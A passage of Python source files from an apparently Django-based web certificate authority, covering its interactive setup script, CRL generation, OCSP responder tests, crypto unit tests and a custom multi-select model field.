'PORT': '%(port)s',
}
"""
ALLOWED_HOSTS = """
ALLOWED_HOSTS = {}
"""
OCSP_URL = """
# OCSP
OCSP_URL = 'http://{}/'
"""
def get_host_names():
"""Get the required host names for ALLOWED_HOSTS"""
print("""
As a security measure, the web applications need to know the host names that will be used by the users to access them.
We need to configure the host for the public web and another for the admin web.
The OCSP responder also needs a hostname. Requests will go to http://<ocsp_host>/
""")
web_host = input('Public web host: ').lower()
admin_host = input('Admin web host: ').lower()
ocsp_host = input('OCSP host: ').lower()
option = input('\nAre these correct? (Y/n)').lower()
if option == 'n':
return get_host_names()
return {'web': web_host, 'admin': admin_host, 'ocsp': ocsp_host}
def create_settings(config, hosts):
"""Write settings files."""
web_path = os.path.join(BASE_DIR, 'webca', 'settings_local.py')
admin_path = os.path.join(
BASE_DIR, 'webca', 'ca_admin', 'settings_local.py')
service_path = os.path.join(
BASE_DIR, 'webca', 'ca_service', 'settings_local.py')
ocsp_path = os.path.join(BASE_DIR, 'webca', 'ca_ocsp', 'settings_local.py')
_create_db_settings(config, 'web_', DB_DEFAULT, web_path)
_create_db_settings(config, 'certs_', DB_CERTS, admin_path)
_create_db_settings(config, 'certs_', DB_CERTS, service_path)
_create_db_settings(config, 'certs_', DB_CERTS, ocsp_path)
_generic_settings(web_path, ALLOWED_HOSTS.format([hosts['web']]))
_generic_settings(admin_path, ALLOWED_HOSTS.format([hosts['admin']]))
_generic_settings(admin_path, OCSP_URL.format(hosts['ocsp']))
_generic_settings(service_path, OCSP_URL.format(hosts['ocsp']))
_generic_settings(ocsp_path, ALLOWED_HOSTS.format([hosts['ocsp']]))
def _create_db_settings(config, prefix, template, path):
print('Writing ' + path)
settings_local = open(path, 'w', encoding='utf-8')
settings_local.writelines(template % {
'engine': config[prefix+'engine'],
'server': config[prefix+'server'],
'name': config[prefix+'name'],
'user': config[prefix+'user'],
'password': config[prefix+'password'],
'port': config[prefix+'port'],
})
settings_local.close()
def _generic_settings(path, value):
settings_local = open(path, 'a+', encoding='utf-8')
settings_local.writelines(value)
settings_local.close()
def init_django():
"""Initialize Django."""
print('\nInitializing Django...')
import django
try:
django.setup()
except Exception as ex:
import traceback
traceback.print_exc()
print('There was an error initializing up Django: {}'.format(ex))
print('Exiting...')
exit()
# Django is available, migrate first
from django.core.management import call_command
from django.core.exceptions import ImproperlyConfigured
try:
call_command('migrate', interactive=False)
except ImproperlyConfigured as ex:
print('Error setting up databases: {}'.format(ex))
try:
call_command('migrate', 'certstore_db',
database='certstore_db',
settings='webca.ca_admin.settings',
interactive=False)
except ImproperlyConfigured as ex:
print('Error setting up databases: {}'.format(ex))
def setup_certificates():
"""Setup the CA certificates."""
print('\nA CA certificate needs to be imported or created.')
# List available certificate stores
stores = CertStore.all()
print('These are the available certificate stores.')
if len(stores) == 1:
name, cls = stores[0]
print('The only store available is: %s' % name)
store = cls()
else:
option = 0
i = 1
while option < 1 or option > len(stores):
for name, cls in stores:
print('{}. {}'.format(i, name))
option = input('Choose a certificate store: ')
try:
option = int(option)
except:
option = 0
store = stores[option - 1][1]()
ca_key, ca_cert = _setup_certificates_ca(store)
_setup_certificates_csr(store)
# FUTURE: this doesn't make sense anymore. we are not using client cert auth now
_setup_certificates_user(store, ca_key, ca_cert)
_setup_certificates_ocsp(store, ca_key, ca_cert)
def _setup_certificates_csr(store):
"""Create CSR signing keypair/certificate"""
from webca.config.models import ConfigurationObject as Config
name = [
('CN', 'Internal CSR Signing'),
('O', 'WebCA'),
]
dur = (1 << 31) - 1
csr_keys, csr_cert = certs.create_self_signed(name, duration=dur)
store.add_certificate(csr_keys, csr_cert)
Config.set_value(p.CERT_CSRSIGN, '{},{}'.format(
store.STORE_ID, int_to_hex(csr_cert.get_serial_number())
))
def _setup_certificates_ca(store):
"""Set up the CA certificate."""
from webca.config.models import ConfigurationObject as Config
print('\nThe CA needs a certificate. '
'You must import one or create a self-signed one now.')
option = 0
while option not in [1, 2]:
print('\n1. Import a PFX')
print('2. Generate a self-signed Root CA using RSA')
option = input('Choose an option: ')
try:
option = int(option)
except ValueError:
pass
ca_key = ca_cert = ca_serial = None
if option == 1:
# Import a PFX
filename = input('Filename: ')
from django.core.management import call_command, CommandError
try:
out = io.StringIO()
call_command('importpfx', filename,
store.__class__.__name__, stdout=out)
ca_serial = re.search(r'serial=(\w+)', out.getvalue()).groups()[0]
ca_cert = store.get_certificate(ca_serial)
ca_key = store.get_private_key(ca_serial)
except CommandError as ex:
print('Error importing PFX: %s' % ex)
sys.exit()
else:
# Generate a self-signed CA
bits = -1
while bits < 2048:
try:
bits = input('Key size (min 2048 bits): ')
if not bits:
bits = 2048
else:
bits = int(bits)
except ValueError:
pass
c = -1
while c == -1:
c = input('Country (2-letters): ').upper()
if c and c not in iso3166:
c = -1
st = input('State: ')
l = input('Locality: ')
o = input('Organization: ')
ou = input('Organizational Unit: ')
cn = input('Common name: ')
print('\nThis is the name of the certificate:')
print("""
Country: %s
State: %s
Locality: %s
Organization: %s
Organizational Unit: %s
Common Name: %s""" % (c, st, l, o, ou, cn))
option = input('Is this OK? (Y/n)').lower()
if option == 'n':
return _setup_certificates_ca(store)
else:
name = {}
if c:
name['C'] = c
if st:
name['ST'] = st
if l:
name['L'] = l
if o:
name['O'] = o
if ou:
name['OU'] = ou
if cn:
name['CN'] = cn
name = dict_as_tuples(name)
ca_key, ca_cert = certs.create_ca_certificate(name, bits)
store.add_certificate(ca_key, ca_cert)
ca_serial = int_to_hex(ca_cert.get_serial_number())
Config.set_value(p.CERT_KEYSIGN, '{},{}'.format(
store.STORE_ID, ca_serial
))
Config.set_value(p.CERT_CRLSIGN, '{},{}'.format(
store.STORE_ID, ca_serial
))
return ca_key, ca_cert
def _setup_certificates_user(store, ca_key, ca_cert):
"""Create user authentication certificate."""
from webca.config.models import ConfigurationObject as Config
name = [
('CN', 'User Authencation'),
('O', 'WebCA'),
]
user_key, user_cert = certs.create_ca_certificate(
name, 2048, pathlen=0, duration=10*365*24*3600,
signing_cert=(ca_cert, ca_key))
store.add_certificate(user_key, user_cert)
Config.set_value(p.CERT_USERSIGN, '{},{}'.format(
store.STORE_ID, int_to_hex(user_cert.get_serial_number())
))
def _setup_certificates_ocsp(store, ca_key, ca_cert):
"""Create OCSP signing certificate."""
from webca.config.models import ConfigurationObject as Config
name = [
('CN', 'OCSP Signing'),
('O', 'WebCA'),
]
ocsp_key = certs.create_key_pair(c.KEY_RSA, 2048)
extensions = [
json_to_extension(
'{"name":"keyUsage","critical":true,"value":"digitalSignature"}'),
json_to_extension(
'{"name":"extendedKeyUsage","critical":false,"value":"OCSPSigning"}'),
]
ocsp_csr = certs.create_cert_request(ocsp_key, name, extensions)
ocsp_cert = certs.create_certificate(
ocsp_csr, (ca_cert, ca_key), new_serial(), (0, 10*365*24*3600))
store.add_certificate(ocsp_key, ocsp_cert)
Config.set_value(p.CERT_OCSPSIGN, '{},{}'.format(
store.STORE_ID, int_to_hex(ocsp_cert.get_serial_number())
))
def setup_crl_publishing():
"""Do some minimal CRL configuration.
We just need to create the default configuration.
The CRLs will be published every 15 days and the location will be the STATIC folder.
"""
from django.conf import settings
from webca.config.models import ConfigurationObject as Config
from webca.web.models import CRLLocation
print("\n\nCRL publishing setup.\n\nA URL where the CRL will be published is needed.")
crl_url = input("CRL location: ")
# TODO: Validate the URL
crl = CRLLocation(url=crl_url)
crl.save()
config = new_crl_config()
config['path'] = os.path.join(settings.STATIC_ROOT, 'ca.crl')
Config.set_value(p.CRL_CONFIG, json.dumps(config))
print("Default CRL publishing freq: 15 days")
print("Default CRL publishing path: %s" % config['path'])
def install_templates():
"""Create default templates."""
print('\nDo you want some certificate templates to be automatically created?')
option = input('Continue? (Y/n): ').lower()
if option == 'n':
return
from django.core import serializers
data = open(os.path.join(BASE_DIR, 'setup/templates.json'))
templates = serializers.deserialize('json', data)
for template in templates:
template.save()
print('Created: %s' % template.object.name)
def setup_user_groups():
"""Create the default groups"""
from django.contrib.auth.models import Group
group = Group(name="All Users")
group.save()
group = Group(name="Operators")
group.save()
def setup_super_user():
from django.core.management import call_command
from django.core.exceptions import ImproperlyConfigured
print("A super user/administrator needs to be created.")
try:
call_command("createsuperuser", interactive=True)
except ImproperlyConfigured as ex:
print('Error creating the super user: {}'.format(ex))
def setup_email():
"""Display Email configuration warning."""
from django.conf import settings
print("\nAn email server must be setup so that users can authenticate.")
print("Review the EMAIL settings in the settings file and update them: {}".format(
os.path.join(settings.BASE_DIR, 'webca', 'settings.py')
))
def collect_static():
"""Run collectstatic"""
from django.conf import settings
from django.core.management import call_command
from django.core.exceptions import ImproperlyConfigured
print("\nNow the static files of the web applications will be copied to a folder.")
try:
call_command("collectstatic", interactive=False)
except ImproperlyConfigured as ex:
print('Error collecting static files: {}'.format(ex))
print('\nYou need to make your web server serve the files in the folder "{}" in the '
'following URL of your web applications: {}'.format(settings.STATIC_ROOT, settings.STATIC_URL))
def review_secret_key():
"""Display SECRET_KEY warning."""
from django.conf import settings
print("""
***********************************************
Django uses a secret key for internal purposes.
You *MUST* change the value of the variable SECRET_KEY in the following locations:
{}
{}
{}
{}
""".format(
os.path.join(settings.BASE_DIR, 'webca', 'settings.py'),
os.path.join(settings.BASE_DIR, 'webca', 'ca_admin', 'settings.py'),
os.path.join(settings.BASE_DIR, 'webca', 'ca_ocsp', 'settings.py'),
os.path.join(settings.BASE_DIR, 'webca', 'ca_service', 'settings.py'),
))
if __name__ == '__main__':
try:
setup()
except KeyboardInterrupt:
print('\n\n**** Setup is NOT complete ****', file=sys.stderr)
print('**** Please run this script again ****\n', file=sys.stderr)
sys.exit(-1)
```
#### File: webca/ca_ocsp/tests.py
```python
from base64 import b64encode
from urllib.parse import quote
from asn1crypto.ocsp import OCSPRequest, OCSPResponse, TBSRequest
from django.test import TestCase
def build_request_good():
tbs_request = TBSRequest({
'request_list': [
{
'req_cert': {
'hash_algorithm': {
'algorithm': 'sha1'
},
'issuer_name_hash': b'379276ADE1846D5A1D184BC135A2D3D23B221DA2',
'issuer_key_hash': b'C7BA089932AE7ABE29D136723E5FF49F480F68F3',
'serial_number': 221578034377984887419532563643305653706,
},
'single_request_extensions': []
}
],
'request_extensions': []
})
ocsp = OCSPRequest({
'tbs_request': tbs_request,
'optional_signature': None
})
return ocsp
def build_request_revoked():
tbs_request = TBSRequest({
'request_list': [
{
'req_cert': {
'hash_algorithm': {
'algorithm': 'sha1'
},
'issuer_name_hash': b'379276ADE1846D5A1D184BC135A2D3D23B221DA2',
'issuer_key_hash': b'C7BA089932AE7ABE29D136723E5FF49F480F68F3',
'serial_number': 43335495160811514204812512316928417740,
},
'single_request_extensions': []
}
],
'request_extensions': []
})
ocsp = OCSPRequest({
'tbs_request': tbs_request,
'optional_signature': None
})
return ocsp
class OCSP(TestCase):
"""Test the OCSP responder."""
fixtures = [
# 'initial',
'config',
'certstore_db',
]
multi_db = True
def test_get_empty(self):
"""Empty GET."""
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
ocsp = OCSPResponse.load(response.content)
self.assertEqual(ocsp.native['response_status'], 'malformed_request')
def test_get_slug_invalid(self):
"""Invalid GET request."""
response = self.client.get('/something')
self.assertEqual(response.status_code, 200)
ocsp = OCSPResponse.load(response.content)
self.assertEqual(ocsp.native['response_status'], 'malformed_request')
def test_get(self):
"""Valid GET request."""
ocsp = build_request_good()
body = quote(b64encode(ocsp.dump()).decode('utf8'))
response = self.client.get('/' + body)
self.assertEqual(response.status_code, 200)
ocsp = OCSPResponse.load(response.content)
self.assertEqual(ocsp.native['response_status'], 'successful')
def test_post_revoked(self):
"""Valid POST request."""
ocsp = build_request_revoked()
response = self.client.post('/', data=ocsp.dump(), content_type='application/ocsp-request')
self.assertEqual(response.status_code, 200)
ocsp = OCSPResponse.load(response.content)
self.assertEqual(ocsp.native['response_status'], 'successful')
def test_post_good(self):
"""Valid POST request."""
ocsp = build_request_good()
response = self.client.post('/', data=ocsp.dump(), content_type='application/ocsp-request')
self.assertEqual(response.status_code, 200)
ocsp = OCSPResponse.load(response.content)
self.assertEqual(ocsp.native['response_status'], 'successful')
```
#### File: webca/crypto/crl.py
```python
from datetime import datetime, timedelta
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from OpenSSL import crypto
from webca.crypto.extensions import get_certificate_extension
from webca.crypto.utils import datetime_to_asn1, int_to_hex
REASON_UNSPECIFIED = crypto.Revoked().all_reasons()[0]
# is_delta=False, delta_number=None, crl_locations=None
def create_crl(revoked_list, days, issuer, number):
"""Create a CRL using cryptography's API and then convert it to pyopenssl.
Arguments
----------
`revoked_list` - list of (serial, revocation_date, reason) tuples describing the revoked certificates
`days` - number of days for the next update
`issuer` - cert,key tuple of the certificate used to sign the CRL
`number` - CRL sequence number
"""
issuer_cert, issuer_key = issuer
# crl_locations = crl_locations or []
builder = x509.CertificateRevocationListBuilder()
name_attrs = []
if issuer_cert.get_subject().CN:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.COMMON_NAME,
issuer_cert.get_subject().CN
)
)
if issuer_cert.get_subject().C:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.COUNTRY_NAME,
issuer_cert.get_subject().C
)
)
if issuer_cert.get_subject().ST:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.STATE_OR_PROVINCE_NAME,
issuer_cert.get_subject().ST
)
)
if issuer_cert.get_subject().L:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.LOCALITY_NAME,
issuer_cert.get_subject().L
)
)
if issuer_cert.get_subject().O:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.ORGANIZATION_NAME,
issuer_cert.get_subject().O
)
)
if issuer_cert.get_subject().OU:
name_attrs.append(
x509.NameAttribute(
x509.oid.NameOID.ORGANIZATIONAL_UNIT_NAME,
issuer_cert.get_subject().OU
)
)
builder = builder.issuer_name(x509.Name(name_attrs))
builder = builder.last_update(datetime.utcnow())
builder = builder.next_update(datetime.utcnow() + timedelta(days=days))
for serial, date, reason in revoked_list:
ext = x509.CRLReason(x509.ReasonFlags(reason))
revoked_cert = x509.RevokedCertificateBuilder(
).serial_number(
serial
).revocation_date(
date
).add_extension(
ext, False
).build(default_backend())
builder = builder.add_revoked_certificate(revoked_cert)
# To add the AKI extension, we have to read the SKI extension from the
# signing certificate
ski = get_certificate_extension(issuer_cert, b'subjectKeyIdentifier')
if ski:
ski = bytes.fromhex(str(ski).replace(':', '').lower())
ext = x509.AuthorityKeyIdentifier(ski, None, None)
builder = builder.add_extension(ext, False)
# Add CRL Number
ext = x509.CRLNumber(number)
builder = builder.add_extension(ext, False)
# Add Delta CRL Number
# if is_delta:
# if number >= delta_number:
# raise ValueError('delta_number')
# ext = x509.DeltaCRLIndicator(delta_number)
# builder = builder.add_extension(ext, False)
# FUTURE: Add Freshest CRL. Cryptography doesn't support building
# CRLs with this extension so we can't create Delta CRLs right now
# if not is_delta and crl_locations:
# url = crl_locations[0]
# point = x509.DistributionPoint(
# full_name=[x509.DNSName(url)],
# relative_name=None,
# reasons=None,
# crl_issuer=None,
# )
# ext = x509.FreshestCRL(distribution_points=[point])
# builder = builder.add_extension(ext, False)
# FUTURE: add Issuing Distribution Point
# This extension is not supported by criptography either
# https://tools.ietf.org/html/rfc5280#section-5.2.5
# Although the extension is critical, conforming implementations
# are not required to support this extension.
# However, implementations that do not support this extension
# MUST either treat the status of any certificate not listed
# on this CRL as unknown or locate another CRL that does not
# contain any unrecognized critical extensions.
crl = builder.sign(
issuer_key.to_cryptography_key(),
hashes.SHA256(),
default_backend(),
)
openssl_crl = crypto.CRL.from_cryptography(crl)
return openssl_crl
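# Usage sketch (illustrative values; `issuer_cert`/`issuer_key` are assumed to be
# pyOpenSSL objects loaded elsewhere):
#
#     from datetime import datetime
#     revoked = [(0x1A2B3C, datetime.utcnow(), 'unspecified')]
#     crl = create_crl(revoked, days=15, issuer=(issuer_cert, issuer_key), number=1)
#     pem = crypto.dump_crl(crypto.FILETYPE_PEM, crl)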
```
#### File: webca/crypto/tests.py
```python
from datetime import datetime, timedelta
import pytz
from cryptography import x509
from django.test import TestCase
from OpenSSL import crypto
from . import constants as c
from . import certs, crl, utils
from .exceptions import CryptoException
class KeyPair(TestCase):
"""create_key_pair"""
def test_key_pair(self):
"""Test that we get what we asked for."""
key_pair = certs.create_key_pair(c.KEY_RSA, 512)
self.assertIsInstance(key_pair, crypto.PKey)
self.assertEqual(key_pair.bits(), 512)
self.assertEqual(key_pair.type(), crypto.TYPE_RSA)
key_pair = certs.create_key_pair(c.KEY_DSA, 512)
self.assertIsInstance(key_pair, crypto.PKey)
self.assertEqual(key_pair.bits(), 512)
self.assertEqual(key_pair.type(), crypto.TYPE_DSA)
def test_key_type(self):
"""Test correct args."""
self.assertRaises(ValueError,
certs.create_key_pair, key_type=c.KEY_EC, bits=512)
self.assertRaises(ValueError,
certs.create_key_pair, key_type=-1, bits=512)
self.assertRaises(ValueError,
certs.create_key_pair, key_type=4, bits=512)
self.assertRaises(ValueError,
certs.create_key_pair, key_type='1', bits=512)
def test_bits(self):
"""Test correct args."""
self.assertRaises(ValueError,
certs.create_key_pair, key_type=c.KEY_RSA, bits=-1)
class Request(TestCase):
"""create_cert_request"""
def test_request(self):
"""Test correct type."""
keys = certs.create_key_pair(c.KEY_RSA, 512)
name = [
('CN', 'test'),
('C', 'ES'),
('ST', 'test'),
('L', 'test'),
('O', 'test'),
('OU', 'test'),
('emailAddress', '<EMAIL>'),
]
request = certs.create_cert_request(keys, name)
self.assertIsInstance(request, crypto.X509Req)
def test_signing(self):
"""Test signing key."""
skey = certs.create_key_pair(c.KEY_RSA, 512)
name = [('CN', 'test'),]
keys = certs.create_key_pair(c.KEY_RSA, 512)
request = certs.create_cert_request(keys, name, signing_key=skey)
self.assertTrue(request.verify(skey))
def test_extensions(self):
"""Test extensions."""
name = [('CN', 'test'),]
keys = certs.create_key_pair(c.KEY_RSA, 512)
request = certs.create_cert_request(keys, name)
self.assertEqual(request.get_extensions(), [])
exts = [
crypto.X509Extension(b'basicConstraints', True, b'CA:FALSE')
]
request = certs.create_cert_request(keys, name, exts)
self.assertEqual(len(request.get_extensions()), 1)
class Certificate(TestCase):
"""create_certificate"""
def build_certificate(self, name=None, add_exts=False):
name = name or [
('CN', 'test'),
('C', 'ES'),
('ST', 'test'),
('L', 'test'),
('O', 'test'),
('OU', 'test'),
('emailAddress', '<EMAIL>'),
]
keys = certs.create_key_pair(c.KEY_RSA, 512)
if add_exts:
exts = [
crypto.X509Extension(b'basicConstraints', True, b'CA:FALSE')
]
else:
exts = []
req = certs.create_cert_request(keys, name, exts)
cert = certs.create_certificate(req, (req, keys), 1, (0, 3600))
return keys, req, cert
def build_certificate2(self, **kwargs):
name = [
('CN', 'test2'),
('C', 'ES'),
('ST', 'test2'),
('L', 'test2'),
('O', 'test2'),
('OU', 'test2'),
('emailAddress', '<EMAIL>'),
]
return self.build_certificate(name, **kwargs)
def test_certificate(self):
"""Test correct type."""
keys, req, cert = self.build_certificate()
self.assertIsInstance(cert, crypto.X509)
def test_serial(self):
"""Test serial."""
keys, req, cert = self.build_certificate()
self.assertEqual(cert.get_serial_number(), 1)
def test_subject(self):
"""Test serial."""
keys, req, cert = self.build_certificate()
self.assertEqual(cert.get_subject().CN, 'test')
self.assertEqual(cert.get_subject().C, 'ES')
self.assertEqual(cert.get_subject().ST, 'test')
self.assertEqual(cert.get_subject().L, 'test')
self.assertEqual(cert.get_subject().O, 'test')
self.assertEqual(cert.get_subject().OU, 'test')
self.assertEqual(cert.get_subject().emailAddress, '<EMAIL>')
def test_pubkey(self):
"""Test pubkey."""
keys, req, cert = self.build_certificate()
pem1 = crypto.dump_publickey(crypto.FILETYPE_PEM, req.get_pubkey())
pem2 = crypto.dump_publickey(crypto.FILETYPE_PEM, cert.get_pubkey())
self.assertEqual(pem1, pem2)
def test_issuer_name_self(self):
"""issuer name on self signed certs"""
keys, req, cert = self.build_certificate()
self.assertEqual(req.get_subject(), cert.get_subject())
def test_issuer_name(self):
"""issuer name"""
keys, req, cert = self.build_certificate()
keys2, req2, cert2 = self.build_certificate2()
certificate = certs.create_certificate(req, (cert2, keys2), 1, (0, 10))
self.assertEqual(certificate.get_issuer(), req2.get_subject())
def test_issuer_keyid(self):
"""issuer name"""
keys, req, cert = self.build_certificate()
keys2, req2, cert2 = self.build_certificate2()
exts = dict()
for i in range(0, cert2.get_extension_count()):
exts[cert2.get_extension(i).get_short_name()] = cert2.get_extension(i)
ca_ski = exts[b'subjectKeyIdentifier']
certificate = certs.create_certificate(req, (cert2, keys2), 1, (0, 10))
exts = dict()
for i in range(0, certificate.get_extension_count()):
exts[certificate.get_extension(i).get_short_name()] = certificate.get_extension(i)
aki = exts[b'authorityKeyIdentifier']
self.assertTrue(str(ca_ski) in str(aki))
def test_issuer_signature(self):
"""issuer name"""
keys, req, cert = self.build_certificate()
keys2, req2, cert2 = self.build_certificate2()
certificate = certs.create_certificate(req, (cert2, keys2), 1, (0, 10))
self.assertIsNone(crypto.verify(
cert2,
certificate.to_cryptography().signature,
certificate.to_cryptography().tbs_certificate_bytes,
"sha256",
))
def test_extensions(self):
"""Cert without declared extensions."""
keys, req, cert = self.build_certificate(add_exts=False)
# On an issued certificate, there's always authorityKeyIdentifier + subjectKeyIdentifier
self.assertEqual(cert.get_extension_count(), 2)
def test_extensions_extra(self):
"""Cert with an extra extension."""
keys, req, cert = self.build_certificate(add_exts=True)
# On an issued certificate, there's always authorityKeyIdentifier + subjectKeyIdentifier
self.assertEqual(cert.get_extension_count(), 3)
def test_validity(self):
"""Check the validity is the asked for."""
keys, req, cert = self.build_certificate()
now = datetime.now(pytz.utc) + timedelta(hours=1)
self.assertGreater(now, utils.asn1_to_datetime(cert.get_notBefore()))
self.assertLess(utils.asn1_to_datetime(cert.get_notAfter()), now)
def test_validity_ca(self):
"""Check against CA validity."""
keys, req, cert = self.build_certificate()
keys2, req2, cert2 = self.build_certificate()
self.assertRaises(
CryptoException,
certs.create_certificate,
req, (cert2, keys2), 1, (-10, 4000),
)
self.assertRaises(
CryptoException,
certs.create_certificate,
req, (cert2, keys2), 1, (0, 4000),
)
class SelfSignedCertificate(TestCase):
"""create_self_signed"""
def test_name(self):
"""Test the name and issuer."""
name = [
('CN', 'test'),
('C', 'ES'),
('ST', 'test'),
('L', 'test'),
('O', 'test'),
('OU', 'test'),
('emailAddress', '<EMAIL>'),
]
key, cert = certs.create_self_signed(name)
self.assertEqual(cert.get_subject(), cert.get_issuer())
class CACertificate(TestCase):
"""create_ca_certificate"""
name = [
('CN', 'test'),
('C', 'ES'),
('ST', 'test'),
('L', 'test'),
('O', 'test'),
('OU', 'test'),
('emailAddress', '<EMAIL>'),
]
def test_create(self):
"""Test the name and issuer."""
key, cert = certs.create_ca_certificate(self.name)
self.assertEqual(cert.get_subject(), cert.get_issuer())
def test_basic_constraints(self):
"""Test basicConstraints"""
key, cert = certs.create_ca_certificate(self.name)
ext = cert.get_extension(0)
self.assertEqual(ext.get_short_name(), b'basicConstraints')
self.assertTrue(ext.get_critical())
self.assertEqual(ext.get_data(), b'0\x03\x01\x01\xff')
def test_key_usage(self):
"""Test keyUsage"""
key, cert = certs.create_ca_certificate(self.name)
ext = cert.get_extension(1)
self.assertEqual(ext.get_short_name(), b'keyUsage')
self.assertTrue(ext.get_critical())
self.assertEqual(ext.get_data(), b'\x03\x02\x01\x06')
def test_pathlen(self):
"""Test pathlen"""
key, cert = certs.create_ca_certificate(self.name, pathlen=2)
ext = cert.get_extension(0)
self.assertEqual(ext.get_short_name(), b'basicConstraints')
self.assertTrue(ext.get_critical())
        self.assertEqual(ext.get_data(), b'0\x06\x01\x01\xff\x02\x01\x02')  # last byte encodes pathlen=2
class CRL(TestCase):
"""Test CRL creation"""
revoked = [
(1, datetime.now(pytz.utc), x509.ReasonFlags.unspecified),
]
name = [
('CN', 'test'),
('C', 'ES'),
('ST', 'test'),
('L', 'test'),
('O', 'test'),
('OU', 'test'),
]
def test_creation(self):
"""Test CRL creation."""
ca_key, ca_cert = certs.create_ca_certificate(self.name, bits=512)
ca_crl = crl.create_crl(self.revoked, 15, (ca_cert, ca_key), 1)
self.assertIsInstance(ca_crl, crypto.CRL)
def test_issuer(self):
"""Test CRL issuer."""
ca_key, ca_cert = certs.create_ca_certificate(self.name, bits=512)
ca_crl = crl.create_crl(self.revoked, 15, (ca_cert, ca_key), 1)
self.assertEqual(ca_crl.get_issuer(), ca_cert.get_issuer())
def test_revoked(self):
"""Test CRL issuer."""
ca_key, ca_cert = certs.create_ca_certificate(self.name, bits=512)
ca_crl = crl.create_crl(self.revoked, 15, (ca_cert, ca_key), 1)
self.assertEqual(len(ca_crl.get_revoked()), 1)
def test_revoked_empty(self):
"""Test CRL issuer."""
ca_key, ca_cert = certs.create_ca_certificate(self.name, bits=512)
ca_crl = crl.create_crl([], 15, (ca_cert, ca_key), 1)
self.assertIsNone(ca_crl.get_revoked())
def test_signature(self):
"""Test CRL issuer."""
ca_key, ca_cert = certs.create_ca_certificate(self.name, bits=512)
ca_crl = crl.create_crl([], 15, (ca_cert, ca_key), 1)
self.assertIsNone(crypto.verify(
ca_cert,
ca_crl.to_cryptography().signature,
ca_crl.to_cryptography().tbs_certlist_bytes,
"sha256",
))
```
#### File: webca/utils/fields.py
```python
from django import forms
from django.contrib.humanize.templatetags.humanize import apnumber
from django.core.exceptions import ValidationError
from django.db import models
from django.template.defaultfilters import pluralize
from django.utils.text import capfirst
class MultiSelectFormField(forms.MultipleChoiceField):
"""Multi select checkbox form field with max_choices option."""
widget = forms.CheckboxSelectMultiple
def __init__(self, *args, **kwargs):
self.max_choices = kwargs.pop('max_choices', 0)
super(MultiSelectFormField, self).__init__(*args, **kwargs)
def clean(self, value):
if not value and self.required:
raise forms.ValidationError(self.error_messages['required'])
if value and self.max_choices and len(value) > self.max_choices:
raise forms.ValidationError(
'You must select a maximum of %s choice%s.'
% (
apnumber(self.max_choices),
pluralize(self.max_choices)))
return value
class MultiSelectField(models.CharField):
"""
Multiselection field that stores choices in a comma separated list.
"""
# __metaclass__ = models.SubfieldBase
description = "Multiselection field."
def __init__(self, *args, **kwargs):
self.max_choices = kwargs.pop('max_choices', 0)
super().__init__(*args, **kwargs)
def deconstruct(self):
"""Deconstruct for serializers.
For any configuration of your Field instance,
deconstruct() must return arguments that you can pass to __init__
to reconstruct that state.
"""
name, path, args, kwargs = super().deconstruct()
return name, path, args, kwargs
def to_python(self, value):
"""
to_python() is called by deserialization and during the clean()
method used from forms.
"""
if isinstance(value, list):
return value
if value is None:
return value
return value.split(',')
def from_db_value(self, value, expression, connection):
"""
from_db_value() will be called in all circumstances when the data is loaded
from the database, including in aggregates and values() calls.
"""
if value is None:
return value
return value.split(',')
def get_prep_value(self, value):
"""
Override get_prep_value() to convert Python objects back to query values.
"""
if isinstance(value, str):
return value
elif isinstance(value, list):
return ",".join(value)
return None
def formfield(self, **kwargs):
"""
Returns the default django.forms.Field of this field for ModelForm.
"""
# don't call super, as that overrides default widget if it has choices
defaults = {
# 'required': not self.blank,
'required': not self.blank,
'label': capfirst(self.verbose_name),
'help_text': self.help_text,
'choices': self.choices,
'max_choices': self.max_choices,
}
if self.has_default():
defaults['initial'] = self.get_default()
defaults.update(kwargs)
return MultiSelectFormField(**defaults)
def get_internal_type(self):
return "CharField"
def value_to_string(self, obj):
value = self.value_from_object(obj)
return self.get_prep_value(value)
def validate(self, value, model_instance):
# All possible choices
arr_choices = self.get_choices_selected(self.get_choices_default())
for opt_select in value:
if opt_select not in arr_choices:
raise ValidationError(
self.error_messages['invalid_choice'] % value)
return
def get_choices_default(self):
"""Get the choices for this field."""
return self.get_choices(include_blank=False)
def get_choices_selected(self, arr_choices=''):
"""Get the values of the choices."""
if not arr_choices:
return False
selected = []
for choice_selected in arr_choices:
selected.append(choice_selected[0])
return selected
"""
def get_FIELD_display(self, field):
value = getattr(self, field.attname)
choicedict = dict(field.choices)
def contribute_to_class(self, cls, name):
super(MultiSelectField, self).contribute_to_class(cls, name)
if self.choices:
func = lambda self, fieldname = name, choicedict = dict(self.choices): ",".join(
[choicedict.get(value, value) for value in getattr(self, fieldname)])
setattr(cls, 'get_%s_display' % self.name, func)
"""
```
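A short sketch of how this field might be declared on a model; the import path and the model itself are hypothetical, chosen only to illustrate the `choices`/`max_choices` options:

```python
from django.db import models

from webca.utils.fields import MultiSelectField  # assumed import path

KEY_USAGE = [
    ('digitalSignature', 'Digital Signature'),
    ('keyEncipherment', 'Key Encipherment'),
    ('dataEncipherment', 'Data Encipherment'),
]


class ExampleTemplate(models.Model):
    """Hypothetical model: the selections are stored as a comma-separated string."""
    key_usage = MultiSelectField(
        max_length=255,          # backing column is a CharField
        choices=KEY_USAGE,
        max_choices=2,           # enforced by MultiSelectFormField.clean()
        blank=True,
    )
```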
#### File: webca/web/signals.py
```python
from django.contrib.auth.models import User
from django.db.models.signals import post_save, pre_save
from django.dispatch import receiver
from webca.web.models import CAUser
@receiver(post_save, sender=User)
def save_ca_user(sender, instance, **kwargs):
"""Save the instance of CAUser."""
try:
instance.ca_user
except CAUser.DoesNotExist:
CAUser.objects.create(user=instance)
instance.ca_user.save()
```
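The receiver above means that creating a Django user transparently creates its CAUser profile; a hedged illustration for a shell session or test, assuming a configured Django environment with these apps installed:

```python
from django.contrib.auth.models import User

user = User.objects.create(username="alice")  # post_save fires save_ca_user
print(user.ca_user)  # CAUser created automatically by the signal handler
```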
#### File: web/templatetags/webca.py
```python
from datetime import timedelta
from django import template
from django.utils import timezone
from django.utils.safestring import SafeText
from webca.crypto.utils import components_to_name, int_to_hex
from webca.utils import subject_display
register = template.Library()
@register.filter
def required(value): # Only one argument.
